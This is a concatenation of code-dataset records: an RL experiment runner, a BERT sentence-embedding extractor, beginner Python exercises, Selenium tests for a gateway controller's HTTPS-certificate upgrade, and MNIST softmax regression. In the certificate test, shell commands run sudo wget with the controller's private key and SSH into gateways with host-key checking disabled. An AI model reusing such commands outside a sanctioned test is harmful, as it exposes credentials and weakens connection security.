Current step: {} of {}'.format(testing_reward, step, tester.current_step, tester.total_steps))\n\n return testing_reward, trajectory, step\n\ndef run_ihrl_experiment(tester,\n num_agents,\n num_times,\n show_print=True):\n \"\"\"\n Run the entire q-learning with reward machines experiment a number of times specified by num_times.\n\n Inputs\n ------\n tester : Tester object\n Test object holding true reward machine and all information relating\n to the particular tasks, world, learning parameters, and experimental results.\n num_agents : int\n Number of agents in this experiment.\n num_times : int\n Number of times to run the entire experiment (restarting training from scratch).\n show_print : bool\n Flag indicating whether or not to output text to the terminal.\n \"\"\"\n \n learning_params = tester.learning_params\n\n for t in range(num_times):\n # Reseting default step values\n tester.restart()\n\n rm_test_file = tester.rm_test_file\n rm_learning_file_list = tester.rm_learning_file_list\n\n # Verify that the number of local reward machines matches the number of agents in the experiment.\n assertion_string = \"Number of specified local reward machines must match specified number of agents.\"\n assert (len(rm_learning_file_list) == num_agents), assertion_string\n\n if tester.experiment == 'rendezvous':\n testing_env = MultiAgentGridWorldEnv(rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n testing_env = MultiAgentButtonsEnv(rm_test_file, num_agents, tester.env_settings)\n\n num_states = testing_env.num_states\n\n # Create the a list of agents for this experiment\n agent_list = [] \n for i in range(num_agents):\n # The actions available to individual agents should be specified by the TRUE multi-agent environment.\n actions = testing_env.get_actions(i)\n s_i = testing_env.get_initial_state(i)\n num_meta_states = testing_env.get_num_meta_states(i)\n options_list = testing_env.get_options_list(i)\n 
agent_list.append(IhrlAgent(options_list, s_i, num_states, num_meta_states, actions, i))\n\n num_episodes = 0\n\n # Task loop\n epsilon = learning_params.initial_epsilon\n\n while not tester.stop_learning():\n num_episodes += 1\n\n epsilon = epsilon * 0.99\n\n run_ihrl_training(epsilon,\n tester,\n agent_list,\n show_print=show_print)\n\n # Backing up the results\n print('Finished iteration ',t)\n\n tester.agent_list = agent_list\n\n plot_multi_agent_results(tester, num_agents)\n\ndef plot_multi_agent_results(tester, num_agents):\n \"\"\"\n Plot the results stored in tester.results for each of the agents.\n \"\"\"\n\n prc_25 = list()\n prc_50 = list()\n prc_75 = list()\n\n # Buffers for plots\n current_step = list()\n current_25 = list()\n current_50 = list()\n current_75 = list()\n steps = list()\n\n plot_dict = tester.results['testing_steps']\n\n for step in plot_dict.keys():\n if len(current_step) < 10:\n current_25.append(np.percentile(np.array(plot_dict[step]),25))\n current_50.append(np.percentile(np.array(plot_dict[step]),50))\n current_75.append(np.percentile(np.array(plot_dict[step]),75))\n current_step.append(sum(plot_dict[step])/len(plot_dict[step]))\n else:\n current_step.pop(0)\n current_25.pop(0)\n current_50.pop(0)\n current_75.pop(0)\n current_25.append(np.percentile(np.array(plot_dict[step]),25))\n current_50.append(np.percentile(np.array(plot_dict[step]),50))\n current_75.append(np.percentile(np.array(plot_dict[step]),75))\n current_step.append(sum(plot_dict[step])/len(plot_dict[step]))\n\n prc_25.append(sum(current_25)/len(current_25))\n prc_50.append(sum(current_50)/len(current_50))\n prc_75.append(sum(current_75)/len(current_75))\n steps.append(step)\n\n plt.plot(steps, prc_25, alpha=0)\n plt.plot(steps, prc_50, color='red')\n plt.plot(steps, prc_75, alpha=0)\n plt.grid()\n plt.fill_between(steps, prc_50, prc_25, color='red', alpha=0.25)\n plt.fill_between(steps, prc_50, prc_75, color='red', alpha=0.25)\n plt.ylabel('Testing Steps to Task 
Completion', fontsize=15)\n plt.xlabel('Training Steps', fontsize=15)\n plt.locator_params(axis='x', nbins=5)\n plt.show()","sub_path":"src/experiments/run_ihrl_experiment.py","file_name":"run_ihrl_experiment.py","file_ext":"py","file_size_in_byte":18005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"94336006","text":"from custom.bert_extractor import BertExtractor\nimport argparse\nimport pickle\nimport re\nimport spacy\nimport numpy as np\nfrom tqdm import tqdm\n\ndef read_file(path):\n print(\"loading spacy model\")\n nlp = spacy.load(\"en\", disable=['parser', 'tagger', 'ner'])\n nlp.add_pipe(nlp.create_pipe('sentencizer'))\n\n # index of doc sentences, doc key, all ssentences\n indices, keys, all_sents = [], [], []\n max_len = 0\n\n pattern = re.compile(r\"^([^\\t]*)\\t\\s*(.*)\")\n print(\"loading file & sentence breaking\")\n with open(path, \"r\") as f:\n for line in tqdm(f.readlines()):\n m = pattern.match(line.strip())\n if not m:\n continue\n keys.append(m.group(1))\n value = m.group(2)\n doc = nlp(value)\n sents = [sen.string.strip() for sen in doc.sents]\n max_len = max(max_len, max(map(len, doc.sents)))\n indices.append(list(range(len(all_sents), len(all_sents)+len(sents))))\n all_sents.extend(sents)\n\n print(\"max length of sentence %d\" % max_len)\n \n return indices, keys, all_sents\n \n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--input_file\", default=None, type=str, required=True)\n parser.add_argument(\"--output_file\", default=None, type=str, required=True)\n parser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-base-multilingual, bert-base-chinese.\")\n\n ## Other parameters\n parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased 
model.\")\n parser.add_argument(\"--layers\", default=\"-1,-2,-3,-4\", type=str)\n parser.add_argument(\"--max_seq_length\", default=128, type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. Sequences longer \"\n \"than this will be truncated, and sequences shorter than this will be padded.\")\n parser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size for predictions.\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help = \"local_rank for distributed training on gpus\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n\n args = parser.parse_args()\n\n indices, keys, all_sents = read_file(args.input_file)\n\n extractor = BertExtractor(\n bert_model=args.bert_model, \n do_lower_case=args.do_lower_case, \n layers=args.layers.split(','),\n reduce_method=\"sum\", \n max_seq_length=args.max_seq_length,\n batch_size=args.batch_size, \n local_rank=args.local_rank\n )\n\n features = extractor.extract(all_sents)\n\n print(\"merging sentences\")\n kv = {}\n for key, index in zip(keys, indices):\n kv[key] = np.average(np.array([features[idx] for idx in index]), axis=0)\n\n print(\"writing to path %s\" % args.output_file)\n with open(args.output_file, 'wb') as f:\n pickle.dump(kv, f)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"custom/run_extractor.py","file_name":"run_extractor.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"353356573","text":"\"\"\"\nList Exercises Programs\n\n\"\"\"\n\n# 1. 
Basic list operations\nnumbers = []\nfor i in range(0, 5):\n number = int(input(\"Number: \"))\n numbers.append(number)\nprint(f\"The first number is {numbers[0]}\")\nprint(f\"The last number is {numbers[-1]}\")\nnumbers.sort()\nprint(f\"The smallest number is {numbers[0]}\")\nprint(f\"The largest number is {numbers[-1]}\")\naverage = sum(numbers) / len(numbers)\nprint(f\"The average of the numbers is {average}\")\n\n# 2. Woefully inadequate security checker\nusernames = ['jimbo', 'giltson98', 'derekf', 'WhatSup', 'NicolEye', 'swei45', 'BaseInterpreterInterface', 'BaseStdIn',\n 'Command', 'ExecState', 'InteractiveConsole', 'InterpreterInterface', 'StartServer', 'bob']\nusername = input(\"Username: \")\nif username in usernames:\n print(\"Access Granted\")\nelse:\n print(\"Access Denied\")\n","sub_path":"prac_04/list_exercises.py","file_name":"list_exercises.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594431447","text":"\"\"\"\r\nTest scenario: New certificate for security concerns is addressed and is deployed to the gateways.\r\nUpgrade to 121516.166 or later and disable the HTTPS cert\r\nDowngrade to the latest release 112816 and create two gateways then upgrade to the current version 121516.\r\nThen enable the HTTPS cert.\r\nCloud type tested: AWS, ARM and Gcloud\r\n\"\"\"\r\n\r\nimport unittest, logging, time, os\r\nfrom selenium import webdriver\r\nfrom autotest.lib.webui_pages import upgrade as upgd\r\nfrom autotest.lib.webui_pages import gateway\r\nimport autotest.lib.webui_pages.diagnostics as diag\r\nimport autotest.lib.webui_pages.actions_in_common as actions\r\nfrom autotest.lib.backend_utils import SSHCmd\r\nfrom autotest.frontend.webuitest import *\r\nfrom autotest.lib.test_utils import testcases\r\n\r\nclass SecurityWithCertificateTest(WebUITest):\r\n cases = testcases(__name__)\r\n\r\n def test01_upgrade_to_latest(self):\r\n upgrade_view = 
upgd.Upgrade(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n diagnostic_view = diag.Diagnostics(self.driver)\r\n relogin = actions.UCCLogin(self.driver)\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n time.sleep(2)\r\n upgrade_view.check_upgrade_page()\r\n self.logger.info(\"At upgrade page\")\r\n\r\n self.cases.start_test(\"test_case_1\")\r\n self.logger.info(\"Upgrade to a custom release\")\r\n upgrade_view.custom_version = self.cases.case_data[\"custom_version\"]\r\n self.logger.info(\"Click Upgrade to Custom version\")\r\n upgrade_view.click_custom_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(3)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['custom_version'], current_version)\r\n\r\n self.logger.info(\"Navigating to Troubleshooting\")\r\n title = diagnostic_view.navigate_to_troubleshooting()\r\n self.assertEqual(\"Troubleshoot\", title, \"Troubleshooting link does not exist\")\r\n self.logger.info(\"Navigating to Diagnostic\")\r\n diagnostic_view.navigate_to_diagnostics()\r\n self.logger.info(\"Check if Diagnostic is the right page\")\r\n self.assertTrue(diagnostic_view.current_url(), \"Not on the Diagnostic page\")\r\n time.sleep(10)\r\n\r\n self.logger.info(\"Disable Security\")\r\n diagnostic_view.change_security_setting(\"off\")\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(15)\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n 
upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n time.sleep(2)\r\n self.logger.info('Click Upgrade to the latest')\r\n upgrade_view.click_latest_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(10)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['latest_version'], current_version)\r\n\r\n self.cases.end_test(\"test_case_1\")\r\n\r\n def test02_create_2_gateways(self):\r\n gateway_view = gateway.Gateway(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n\r\n self.logger.info(\"Navigating to Gateway\")\r\n gateway_view.navigate_to_gateway()\r\n time.sleep(10)\r\n self.logger.info(\"Checking Gateway is present in the current view area...\")\r\n self.assertTrue(gateway_view.is_gateway_table_present(), \"Gateway view is not present\")\r\n\r\n self.logger.info(\"Start to create 2 gateways for AWS, ARM and Gcloud respectively\")\r\n self.cases.start_test(\"test_case_2\")\r\n\r\n for gw in self.cases.case_data:\r\n self.logger.info(\"Click New Gateway button\")\r\n gateway_view.click_new_gateway_button()\r\n time.sleep(5)\r\n self.assertTrue(gateway_view.new_gateway_panel_is_present(), \"New Gateway panel is not found\")\r\n\r\n assert gateway_view.fill_new_gateway_fields(**self.cases.case_data[gw]), \"Failed to fill in Gateway configuration fields\"\r\n\r\n time.sleep(1)\r\n self.logger.info(\"Clicking OK to create New Gateway...\")\r\n self.assertTrue(actions_in_common.click_ok_button(), \"Failed to click OK for new gateway\")\r\n\r\n 
actions_in_common.wait_progress_bar()\r\n self.driver.refresh()\r\n time.sleep(15)\r\n self.logger.info(\"Checking new gateway's state in gateway table\")\r\n self.assertEquals(gateway_view.gateway_table.check_specific_row_data(self.driver, self.cases.case_data[gw]['06.gateway_name'], 2), self.cases.expected_result['status'],\r\n \"Gateway state is not up.\")\r\n\r\n self.cases.end_test(\"test_case_2\")\r\n\r\n def test03_upgrade_to_preview(self):\r\n upgrade_view = upgd.Upgrade(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n relogin = actions.UCCLogin(self.driver)\r\n gateway_view = gateway.Gateway(self.driver)\r\n diagnostic_view = diag.Diagnostics(self.driver)\r\n sshc = SSHCmd()\r\n time.sleep(5)\r\n\r\n gateway_public_ip_addresses = {}\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n time.sleep(2)\r\n\r\n self.cases.start_test(\"test_case_3\")\r\n self.logger.info(\"Input the custom release version\")\r\n upgrade_view.custom_version = self.cases.case_data[\"custom_version\"]\r\n self.logger.info(\"Click Upgrade to Custom version\")\r\n upgrade_view.click_custom_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(3)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['custom_version'], current_version)\r\n\r\n self.logger.info(\"Start to verify the cert is not deployed because the setting is disabled\")\r\n self.logger.info(\"Get the gateway's public IP\")\r\n 
gateway_view.navigate_to_gateway()\r\n time.sleep(15)\r\n\r\n for gw_name in self.cases.case_data['gateway_names']:\r\n if \"arm\" in gw_name:\r\n column_no = 10\r\n else:\r\n column_no = 8\r\n self.logger.info(\r\n gw_name + \"'s public IP is \" + gateway_view.gateway_table.check_specific_row_data(self.driver, gw_name,\r\n column_no))\r\n gateway_public_ip_addresses[gw_name] = gateway_view.gateway_table.check_specific_row_data(self.driver,\r\n gw_name,\r\n column_no)\r\n\r\n\r\n self.logger.info(\"SSH connect Controller\")\r\n hostip = self.cases.case_data['hostip']\r\n user = self.cases.case_data['ssh_user']\r\n passwd = self.cases.case_data['ssh_password']\r\n kf = os.path.abspath(self.cases.case_data['key_filename'])\r\n sshc.ssh_connect(hostip,user,passwd,kf)\r\n\r\n for gw, gw_ip in gateway_public_ip_addresses.items():\r\n to_gw = \"wget --spider -S https://{} 2>&1 | grep 'insecurely'\".format(gw_ip)\r\n cmd_putput1 = sshc.send_command(to_gw)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_putput1))\r\n self.assertIn(self.cases.expected_result['response'], cmd_putput1[0])\r\n scom = \" wget --spider -S https://{} 2>&1 | grep 'insecurely'\".format(hostip)\r\n if 'arm' in gw:\r\n keyname = gw + \".key\"\r\n else:\r\n keyname = gw + \".pem\"\r\n to_controller = \"sudo ssh -o StrictHostKeyChecking=no -i /var/cloudx/{} ubuntu@{}\".format(keyname,\r\n gw_ip) + scom\r\n cmd_putput2 = sshc.send_command(to_controller)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_putput2))\r\n self.assertIn(self.cases.expected_result['response'], cmd_putput2[0])\r\n\r\n self.logger.info(\"Start to test when the certificate is deployed\")\r\n self.logger.info(\"Enable security with HTTPS certificate\")\r\n\r\n self.logger.info(\"Navigating to Troubleshooting\")\r\n title = diagnostic_view.navigate_to_troubleshooting()\r\n self.logger.info(\"Navigating to Diagnostic\")\r\n diagnostic_view.navigate_to_diagnostics()\r\n time.sleep(10)\r\n\r\n 
self.logger.info(\"Enable Security\")\r\n diagnostic_view.change_security_setting(\"on\")\r\n time.sleep(20)\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(15)\r\n\r\n for gw, gw_ip in gateway_public_ip_addresses.items():\r\n to_gw = \"sudo wget --spider -S https://{} --certificate=/etc/ssl/certs/ctrl.crt --private-key=/etc/ssl/private/ctrl.key --ca-certificate=/etc/ssl/certs/ca.pem 2>&1 | grep HTTP/\".format(gw_ip)\r\n cmd_output1 = sshc.send_command(to_gw)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_output1))\r\n self.assertIn(self.cases.expected_result['response_code'], cmd_output1[0])\r\n scom = \" wget --spider -S https://{} 2>&1 | grep HTTP/\".format(hostip)\r\n if 'arm' in gw:\r\n keyname = gw + \".key\"\r\n else:\r\n keyname = gw + \".pem\"\r\n to_controller = \"sudo ssh -o StrictHostKeyChecking=no -i /var/cloudx/{} ubuntu@{}\".format(keyname,\r\n gw_ip) + scom\r\n cmd_output2 = sshc.send_command(to_controller)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_output2))\r\n self.assertIn(self.cases.expected_result['response_code'], cmd_output2[0])\r\n\r\n self.logger.info(\"Start to delete those 2 gateways for AWS, ARM and Gcloud created for this test\")\r\n self.logger.info(\"Navigating to Gateway\")\r\n gateway_view.navigate_to_gateway()\r\n time.sleep(10)\r\n\r\n for gw_name in self.cases.case_data['gateway_names']:\r\n gateway_view.delete_gateway(gw_name)\r\n time.sleep(3)\r\n self.logger.info(\"Clicking OK to delete the specified gateway...\")\r\n actions_in_common.confirm_ok()\r\n\r\n actions_in_common.wait_progress_bar()\r\n self.driver.refresh()\r\n time.sleep(15)\r\n self.logger.info(\"Verifying deleted gateway is no longer in gateway list\")\r\n self.assertFalse(gateway_view.gateway_table.is_data_present(self.driver, 2, gw_name),\r\n \"Found the specified gateway\")\r\n time.sleep(5)\r\n\r\n 
self.cases.end_test(\"test_case_3\")\r\n\r\n\r\n\r\n","sub_path":"autotest/frontend/settings/upgrade/upgrade_check_cert.py","file_name":"upgrade_check_cert.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"384183165","text":"import chainer\nfrom src.function.activation import relu\nfrom src.function.reshape import flatten\nfrom src.function.pooling import max_pooling_2d\nfrom src.link.convolution_2d import Convolution2D\nfrom src.link.linear import Linear\nfrom src.link.last_linear import LastLinear\n\n\nclass LeNet(chainer.Chain):\n \"\"\"LeNet-like architecture.\n We followed [Lower bounds on the robustness to adversarial perturbations]\n (https://papers.nips.cc/paper/6682-lower-bounds-on-the-robustness-to-adversarial-perturbations).\n\n conv-5x5 channel 20, stride 1x1\n max_pool-2x2 stride 2x2\n conv-5x5 channel 50, stride 1x1\n max_pool-2x2 stride 2x2\n fc 500\n activation\n fc 10\n \"\"\"\n\n def __init__(self):\n super(LeNet, self).__init__()\n initialW = chainer.initializers.HeNormal()\n with self.init_scope():\n self.conv1 = Convolution2D(in_channels=None, out_channels=20, ksize=5, stride=1,\n pad=0, initialW=initialW, nobias=False)\n self.conv2 = Convolution2D(in_channels=20, out_channels=50, ksize=5, stride=1,\n pad=0, initialW=initialW, nobias=False)\n self.fc1 = Linear(500)\n self.fc2 = LastLinear(10)\n\n def __call__(self, x):\n x = self.conv1(x)\n x = relu(x)\n x = max_pooling_2d(x, ksize=2, stride=2, pad=0)\n x = self.conv2(x)\n x = relu(x)\n x = max_pooling_2d(x, ksize=2, stride=2, pad=0)\n x = flatten(x)\n x = self.fc1(x)\n x = relu(x)\n x = self.fc2(x)\n return x\n","sub_path":"src/model/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595064562","text":"#-*- coding:utf-8 -*-\n''' 
\n#文件名:\n#作者:陈圆圆\n#创建日期:\n#模块描述:\n#历史修改记录\n#修改人:\n#修改日期:\n#修改内容:\n'''\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n#导入驱动\nsys.path.append(\"/testIsomp/common/\")\nfrom _initDriver import initDriver\nsys.path.append(\"/testIsomp/testCase/department/\")\nfrom test_department import testDepartment\nsys.path.append(\"/testIsomp/testSuite/common_suite_file/\")\nfrom common_suite_file import setDriver,CommonSuiteData\nimport unittest\n\nclass testDepartSuite(unittest.TestCase):\n\n\tdef setUp(self):\n\n\t\t#调用驱动\n\t\tself.browser = setDriver().set_driver()\n\n\t\tself.comsuit = CommonSuiteData(self.browser)\n\t\tself.testdptment = testDepartment(self.browser)\n\n\t\t#部门前置条件\n\t\tself.comsuit.depart_module_prefix_condition()\n\n\tdef test_department(self):\n\n\t\tu'''添加和编辑部门'''\n\t\tself.testdptment.add_edit_department_001()\n\t\tu'''上移和下移部门'''\n\t\tself.testdptment.up_down_department_002()\n\t\tu'''上移和下移部门校验'''\n\t\tself.testdptment.up_down_department_check_003()\n\t\tu'''检验添加和编辑部门'''\n\t\tself.testdptment.check_add_edit_department_004()\n\t\tu'''删除部门'''\n\t\tself.testdptment.del_department_005()\n\n\tdef tearDown(self):\n\t\tself.comsuit.user_quit()\n\t\tinitDriver().close_driver(self.browser)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"testSuite/test_002_department_suite.py","file_name":"test_002_department_suite.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"603200883","text":"from pylab import *\nimport numpy as np\nfrom scipy.io import loadmat\n\nM = loadmat(\"mnist_all.mat\")\n\n\n################################ PART 1 ####################################\n\n\ndef showDigits():\n '''\n Load the dataset from mnist_all.mat. 
Randomly choose 100 pictures, 10 for each digit\n Combines the 100 pictures to 1 picture and show the picture.\n '''\n M = loadmat(\"mnist_all.mat\")\n\n f, axarr = plt.subplots(10, 10)\n np.random.seed(1)\n for i in range(10):\n digit = \"train\" + str(i)\n shape = M[digit].shape\n for j in range(10):\n rand = np.random.randint(0, shape[0])\n axarr[i, j].imshow(M[digit][rand].reshape((28, 28)), cmap=cm.gray)\n plt.setp([axarr[i, j].get_xticklabels()], visible=False)\n plt.setp([axarr[i, j].get_yticklabels()], visible=False)\n\n plt.show()\n\n\n################################ PART 2 ####################################\n\n\ndef softmax(y):\n '''Return the output of the softmax function for the matrix of output y. y\n is an NxM matrix where N is the number of outputs for a single case, and M\n is the number of cases'''\n return exp(y) / tile(sum(exp(y), 0), (len(y), 1))\n\n\ndef forward_p2(x, w, b):\n '''\n the input x should be 784 x n, the input w should be 784 x 10, the input b\n should be 10 x 1 in our case\n '''\n Os = dot(w.T, x) + b\n result = softmax(Os)\n return result\n\n\n################################ PART 3 ####################################\n\n\ndef NLL(y, y_):\n return -sum(y_ * log(y))\n\n\ndef grad_p3(x, w, b, y):\n '''\n return the gradient of weights and the gradient of biases\n '''\n p = forward_p2(x, w, b)\n dc_do = p - y\n return np.dot(dc_do, x.T).T, np.dot(dc_do, np.ones((x.shape[1], 1)))\n\n\ndef cost(p, y):\n cost = 0\n for i in range(p.shape[1]):\n cost += NLL(p[:, i], y[:, i])\n return cost\n\n\ndef check_grad_w(xn, wn, b, y, grad_w):\n h = 0.0001\n wh = np.zeros((784, 10))\n difference_matrix = np.ones((784, 10))\n error = 0\n for j in range(wn.shape[0]):\n for k in range(wn.shape[1]):\n wh[j, k] = h / 2\n\n wn_m = wn - wh\n p_m = forward_p2(xn, wn_m, b)\n # cost0 = 0\n # for i in range(25):\n # cost0 += NLL(p_m[:, i], y[:, i])\n cost0 = cost(p_m, y)\n\n wn_p = wn + wh\n p_p = forward_p2(xn, wn_p, b)\n cost1 = cost(p_p, y)\n\n 
difference_matrix[j, k] = (cost1 - cost0) / h - grad_w[j, k]\n error += abs((cost1 - cost0) / h - grad_w[j, k])\n wh[j, k] = 0\n # print(difference_matrix)\n print(\n \"The sum of the absolute value of difference for a 784 x 10 matrix is \" + str(\n error))\n print(\n \"The average of the absolute value of difference for a 784 x 10 matrix is \" + str(\n error / 7840))\n\n\ndef check_grad_b(xn, wn, b, y, grad_b):\n h = 0.0001\n bh = np.zeros(b.shape)\n error = 0\n for j in range(b.shape[0]):\n bh[j, 0] = h / 2\n b_p = b + bh\n b_m = b - bh\n p_p = forward_p2(xn, wn, b_p)\n p_m = forward_p2(xn, wn, b_m)\n\n cost0 = cost(p_m, y)\n\n cost1 = cost(p_p, y)\n\n error += abs((cost1 - cost0) / h - grad_b[j, 0])\n bh[j, 0] = 0\n print(\n \"The sum of the absolute value of difference for a 10 x 1 matrix is \" + str(\n error))\n print(\n \"The average of the absolute value of difference for a 10 x 1 matrix is \" + str(\n error / 10))\n\n\ndef part3():\n # generating random numbers for test purpose\n np.random.seed(0)\n xn = np.random.rand(784, 25)\n b = np.random.rand(10, 1)\n y = np.zeros((10, 25))\n j = 0\n for i in range(25):\n y[j, i] = 1\n j = (j + 1) % 10\n wn = np.random.rand(784, 10)\n\n # calculate the gradient value for weights and b\n grad_w, grad_b = grad_p3(xn, wn, b, y)\n\n # verifying the gradient for weights using finite differences\n check_grad_w(xn, wn, b, y, grad_w)\n\n # verifying the gradient for biases using finite differences\n check_grad_b(xn, wn, b, y, grad_b)\n\n\n################################ PART 4 ####################################\n\n\ndef perform(data, weight, bias, answer):\n result = forward_p2(data, weight, bias)\n # correct = 0\n # for i in range(result.shape[1]):\n # if argmax(result[:, i]) == argmax(answer[:, i]):\n # correct += 1\n # return correct / result.shape[1]\n return np.mean(np.argmax(answer, 0) == np.argmax(result, 0))\n\n\ndef grad_descent(f, df, x, y, init_t, init_b, alpha, max_iter, test, t_answer,\n validation, v_answer, 
plotCurve=True):\n EPS = 1e-5 # EPS = 10**(-5)\n prev_t = init_t - 10 * EPS\n t = init_t.copy()\n prev_b = init_b - 10 * EPS\n b = init_b.copy()\n iter = 0\n perfomance_x = [perform(x, t, b, y)]\n perfomance_t = [perform(test, t, b, t_answer)]\n perfomance_v = [perform(validation, t, b, v_answer)]\n iterations = [0]\n print('Doing gradient Descent')\n while (np.linalg.norm(t - prev_t) + np.linalg.norm(\n b - prev_b)) > EPS and iter < max_iter:\n prev_t = t.copy()\n prev_b = b.copy()\n grad_t, grad_b = df(x, t, b, y)\n t -= alpha * grad_t\n b -= alpha * grad_b\n if iter % 100 == 0:\n print(\"Iter\", iter)\n print(\"f(x) = %.2f\" % (f(forward_p2(x, t, b), y)))\n # print(\"Gradient: \", df(x, t, b, y), \"\\n\")\n if plotCurve:\n perfomance_x.append(perform(x, t, b, y))\n perfomance_t.append(perform(test, t, b, t_answer))\n perfomance_v.append(perform(validation, t, b, v_answer))\n iterations.append(iter + 1)\n iter += 1\n if plotCurve:\n plt.plot(iterations, perfomance_x)\n plt.plot(iterations, perfomance_t)\n plt.plot(iterations, perfomance_v)\n plt.legend(['Training Set', 'Test Set', 'Validation Set'],\n loc='upper right')\n plt.axis([-30, max_iter, 0, 1])\n plt.ylabel('Prop. 
of correct guesses')\n plt.xlabel('Iterations')\n plt.show()\n print('Final Cost is ' + format(f(forward_p2(x, t, b), y), '.2f'))\n return t, b\n\n\ndef get_sets():\n x = np.zeros((784, 4000 * 10))\n y = np.zeros((10, 4000 * 10))\n test_set = np.zeros((784, 850 * 10))\n answer_set = np.zeros((10, 850 * 10))\n validation_set = np.zeros((784, 1000 * 10))\n v_answer_set = np.zeros((10, 1000 * 10))\n np.random.seed(0)\n for i in range(10):\n train = \"train\" + str(i)\n test = \"test\" + str(i)\n train_a = M[train].copy()\n test_a = M[train].copy()\n np.random.shuffle(train_a)\n np.random.shuffle(test_a)\n\n one_hot = [0] * 10\n one_hot[i] = 1\n x[:, 4000 * i:4000 * (i + 1)] = (train_a[0:4000]).T / 255.0\n y[:, 4000 * i:4000 * (i + 1)] = np.array([one_hot] * 4000).T\n test_set[:, 850 * i:850 * (i + 1)] = (test_a[0:850]).T / 255.0\n answer_set[:, 850 * i:850 * (i + 1)] = np.array([one_hot] * 850).T\n validation_set[:, 1000 * i:1000 * (i + 1)] = (train_a[\n 4000:5000]).T / 255.0\n v_answer_set[:, 1000 * i:1000 * (i + 1)] = np.array([one_hot] * 1000).T\n return x, y, test_set, answer_set, validation_set, v_answer_set\n\n\ndef part4(iter, graph=True):\n x, y, test_set, answer_set, validation_set, v_answer_set = get_sets()\n # np.random.seed(0)\n init_t = np.zeros((784, 10))\n init_b = np.zeros((10, 1))\n t, b = grad_descent(cost, grad_p3, x, y, init_t, init_b, 0.00003, iter,\n test_set, answer_set, validation_set,\n v_answer_set, graph) # 3000 has highest percentage\n np.savetxt('weight.txt', t)\n np.savetxt('bias.txt', b)\n f, axarr = plt.subplots(2, 5)\n for i in range(10):\n axarr[i // 5, i % 5].imshow(t[:, i].reshape((28, 28)), cmap=\"RdBu\")\n axarr[i // 5, i % 5].set_title('Digit' + str(i))\n plt.show()\n\n\n################################ PART 5 ####################################\n\n\ndef grad_descent_m(f, df, x, y, init_t, init_b, alpha, gamma, max_iter, test,\n t_answer, validation, v_answer, plotCurve=True):\n EPS = 1e-5 # EPS = 10**(-5)\n prev_t = init_t - 10 
